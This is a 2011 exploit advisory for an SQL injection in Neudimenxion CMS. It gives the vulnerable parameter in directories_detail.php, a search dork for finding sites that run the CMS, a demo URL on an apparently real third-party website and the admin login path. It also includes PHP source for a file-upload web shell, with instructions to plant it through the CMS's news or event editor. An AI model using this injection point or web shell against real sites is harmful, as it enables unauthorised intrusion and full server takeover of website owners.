========================================================= # Exploit Title : Neudimenxion CMS SQL Injection # Date : 17 July 2011 # Author : Netrondoank aka netron # Platform/Tested on: Linux # myweb : http://www.ilmuhacker.org # Version : none # Software Link: : http://www.neudimenxion.com/ # dork : "CMS &#169; Neudimenxion.com" ====================================================================== # vuln here http://site/path/directories_detail.php?id=[sqli] demo http://wismasaberkas.com.my/web/directories_detail.php?id=1 Login Admin http://site/admin_login.php ====================================================================== use this exploit for make upload.php upload ure shell via edit news or via event or via tamper data <?php echo '<b>RI<br><br>'.php_uname().'<br></b>'; echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Success !!!</b><br><br>'; } else { echo '<b>Upload Fail !!!</b><br><br>'; } } ?> ====================================================================== [+] Spesial thanks to all friend @ site : IndonesianSecurity.info + palembang Hackerlink + Blitar hackerlink + hacker newbie [+ ]Kimmmonosz + Budi anja (biohazzard ) + Klicak + jos ali joe + Pokeng + Crashblack + nesta + andy_william